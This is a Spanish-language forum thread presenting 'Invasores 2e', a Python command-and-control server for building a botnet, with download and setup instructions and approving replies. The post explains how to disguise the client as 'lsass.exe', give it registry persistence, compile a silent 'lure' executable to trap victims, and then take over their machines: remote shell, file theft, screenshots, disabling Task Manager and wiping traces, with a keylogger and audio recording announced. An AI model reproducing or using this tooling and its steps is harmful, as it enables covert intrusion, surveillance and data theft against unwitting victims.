Invasores - Un C&C para crear una botnet sencilla | Parte I

Iniciado por ???????, Marzo 06, 2020, 09:59:09 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 06, 2020, 09:59:09 PM Ultima modificación: Marzo 06, 2020, 10:02:46 PM por Kirari





Muy buenas a todos! La verdad es que no recuerdo haber escrito un post acá, pero supongo que es la primera vez. :)

Bueno, antes de empezar quiero aclarar que a este proyecto lo deje pausado hace bastante, por lo que puede que falle en algunas ocasiones. Pero aún sigue en fase de desarrollo, desconozco cuando lo seguiré, pero creo que será dentro de poco. ;D

Así que sin más preámbulos, comencemos con lo bueno...

¿Qué es Invasores 2e?

Invasores 2e es un servidor de C&C (desarrollado en Python) para armar una botnet simple.



¿Pero por qué le pusiste "Invasores 2e"?

Bueno, simplemente el "Invasores", porque quise darle al C&C un toque alienígena, con mensajes, música, etc. Más que un servidor de este tipo, le quise dar un estilo de videojuego, pero ya saben cual es la realidad jaja. En cuanto lo del "2e", es solo porque hice varias versiones, desde la "2a" hasta esta. Y ahora posiblemente haga la "2f" que es con entorno gráfico.

Bien, ahora ¿podés explicarme cómo funciona?

Claro, pero primero descarga el programa, lo puedes hacer entrando al siguiente link:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De ahí, vas "Clone or Download" y selecciones "Download ZIP".

O puedes también clonar el repositorio:

Código: php

git clone https://github.com/Kirari-Senpai/invasores-2e.git
cd invasores-2e/


Una vez hecho lo anterior, vamos a instalar las dependencias, hacemos lo siguiente:

Código: php

pip3 install -r requirements.txt


Puede que el pip varíe según como hayan instalado Python, yo de por sí lo tengo como pip3.
Ahora bien, llega lo bueno.



Configurar el servidor
No hay muchas configuraciones para hacer por ahora en Invasores, por lo que solo se puede configurar lo que es la IP y el puerto del servidor. Para hacerlo:

Código: php

cd server/core/


Una vez en ese directorio, con el editor que quieran, abran el archivo "config.py", por ejemplo, yo lo haré con vim:

Código: php

vim config.py


Ahí modificaremos las variables IP y PORT con la de nuestra PC, guardamos y listo.
Luego seguimos con el cliente.

Configurar el cliente

Para el cliente hacemos los mismos pasos que la vez anterior:

Código: php

cd server/core/


Una vez en ese directorio, con el editor que quieran, abran el archivo "config.py", y el resto ya lo saben :)

Código: php

vim config.py


Ahí modificaremos las variables IP y PORT del servidor, guardamos y listo.

Configuraciones extra para el cliente

Otra pequeña configuración es el de la persistencia:

Código: php

NOMBRE_MALWARE = "lsass.exe"        # Acá podrán cambiar el nombre del malware que será copiado para obtener persistencia
RUTA_MALWARE_DESTINO = tempfile.gettempdir() + "\\" + NOMBRE_MALWARE    # La ruta donde se copiará el malware. Por defecto, se copiará en los archivos temporales del usuario
NOMBRE_REGISTRO_MALWARE = NOMBRE_MALWARE[:-4]   # Nombre que tendrá el registro de autoejecucion del malware. Por defecto lleva el nombre original del programa


Ahora que está todo listo, podremos seguir.

Crear ejecutable

Antes de atraer a la víctima, necesitamos crear un señuelo, con el cual atraeremos y controlaremos al capturado. Para esto, hacemos lo siguiente:

Código: php

pyinstaller --noconsole --onefile client.py


** Dependiendo tu sistema operativo, puede que el ejecutable sea "./client" ó "client.exe"**
** Otra dato, es que si por ejemplo al señuelo lo vás a crear en otro sistema, es que allí también, instales las dependencias, porque el ejecutable traerá problemas. **


Bien ahora que aclaramos todo lo de la configuración, podemos seguir con el núcleo.

Comenzar con la invasión

Hacemos lo siguiente:

Código: php

cd server/
python3 invasores.py




Ahora si ¿me puedes explicar cómo funciona o qué hace?

Oh cierto! Bueno antes de empezar con la acción, no podemos operar con alguien si no la abducimos, por tanto, se realizará lo siguiente:


  • Abducción automática

Cuando hayamos raptado al individuo, podremos hacer diferentes cosas:


  • Manejarlo a nuestro antojo mediante una shell
  • Subir y descargar archivos
  • Screenshot
  • Persistencia
  • Autoremoverse
  • Deshabilitar administrador de tareas



Técnica de captura de humanos



Abducción automática
Tus compañeros de nave atraparán terrícolas, sin necesidad de que tu esperes por ellos. En pocas palabras, la tarea para aceptar conexiones, correrá en segundo plano.

Abducción en vivo
Accediendo al menú de abducciones, podremos solicitar ver en vivo la captura de humanos.



Laboratorio

Ver a los individuos que hayas raptado

Dentro del menú laboratorio, simplemente con tipear "listar" podrás ver a todas las personas que hayas capturado en el camino.



Manipulación alienígena

Permite tomar el control de un cuerpo en específico para operar. Esto se hace mediante el comando:

Código: php

manipular <id>




Asesinar basura humana

Una vez que la persona no te haga más falta, puedes eliminarla de tu lista con el siguiente comando:

Código: php

matar <id>




Módulos para operar con el individuo

Estas están disponibles en el menú de "control total", una vez se haya ejecutado el comando de Manipulación alienígena:

Shell
Devuelve una shell.



Subir y descargar archivos

Claramente como lo dice el subtitulo, podrás subir cualquier archivo de tú máquina al del equipo víctima. Igualmente vas a poder descargar cualquier archivo del secuestrado.

Código: php

subir "<Ruta origen completa>" "<Ruta destino completa>"




Código: php

descargar "<Ruta origen completa>" "<Ruta destino completa>"




Screenshot

Si quieres pruebas de que la víctima no te engaña, toma capturas de pantalla para corroborar sus acciones.



Instalarse

Podrás copiarte en los registros del sistema para obtener persistencia.



Remover

Una vez que hayas acabado con la víctima, puedes eliminar todo tipo de rastro del bicho implantado en el sistema.



Deshabilitar administrador de tareas

La víctima tratará de librarse de tí, pero no será muy fácil. Podrás deshabilitar el administrador de tareas para evitar que el cierre tu actividad en su interior.



Persistencia

Podrás copiarte en los registros del sistema para obtener persistencia.



Autoremover

Una vez que hayas acabado con la víctima, puedes eliminar todo tipo de rastro del bicho implantado en el sistema.



Purga masiva

Se hace una limpieza completa en todas las víctimas para no dejar rastros, para posteriormente eliminarlos. Para hacerlo, se utiliza el comando:

Código: php

destruirlos




Próximamente en Invasores

Netcat

Si estabas dudando de esto, bueno es cierto, tenemos soporte con Netcat. En el peor de los casos, que nos sintamos inseguros con la shell común, podremos usar el módulo de Netcat para el mismo fin, pero mucho mejor.

Keylogger

Graba cualquier movimiento que la víctima haga mediante pulsaciones en el teclado. Toda la información se registrará en un archivo.

Grabar audio

Si quieres mantenerte informado de lo que sucede alrededor del capturado, entonces activa este módulo, para escuchar todos sus movimientos.




Perfecto ¿Y cuáles son los requerimientos?

Un sistema operativo basado en Linux. Recomiendo Kali Linux en su última versión 2019.4. Solo ha sido probado en este último, por lo que si lo utiliza en otro sistema, tal vez, podría causarle algún problema.




Para terminar

Sé que no tiene muchas funcionalidades, pero poco a poco se las iré agregando   :D

Y bueno compañeros, eso es todo, a este proyecto aún le falta mucho por mejorar, pero les quería mostrar esta primera parte. Como pudieron apreciar, no es muy difícil de usar, si no saben los comandos, al tipear "ayuda", les mostrará los comandos disponibles. De última, me pueden enviar un msj y trataré de responder a la brevedad. El que quiera aportar es completamente bienvenido.  ;) ;)

Saludos a todos!
Kirari-


@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un post y herramienta por excelencia compañero. ¡Te quedo de rechupete!  :D

~ DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF


Crear ejecutable

Antes de atraer a la víctima, necesitamos crear un señuelo, con el cual atraeremos y controlaremos al capturado. Para esto, hacemos lo siguiente:

Código: [Seleccionar]

pyinstaller --noconsole --onefile No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No entiendo muy bien donde debo ejecutar ese comando, si me lo puede aclarar alguien muchas gracias!!!

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Se usa Pyinstaller para crear un ejecutable (Exe, en el caso de Windows) a partir de un script de Python (.py) con el fin de hacerlo portable.

Ya se ha hecho un post sobre ello: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

~ DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta muchas gracias por tu respuesta amigo un abrazo.

Siempre es un placer  ;)
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Marzo 10, 2020, 11:49:55 PM #7 Ultima modificación: Marzo 11, 2020, 01:05:07 PM por AXCESS
Está muy interesante.

[Modificación]

Ok.
Ya lo entendí.

Es un servidor de comando y control, que permite un abanico de funciones (aquí fue donde me confundí). Siendo la plataforma de soporte.

Leí el post con calma y descansado. Ya al instalarlo es mucho más obvio.

Es que hice fijación con las funciones. Pero ya entendí lo de la intrusión, el señuelo, etc.

Lo de los marcianos, me sacó del paso también.

Muy bueno.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Muchas gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta! Aprecio mucho el comentario   :D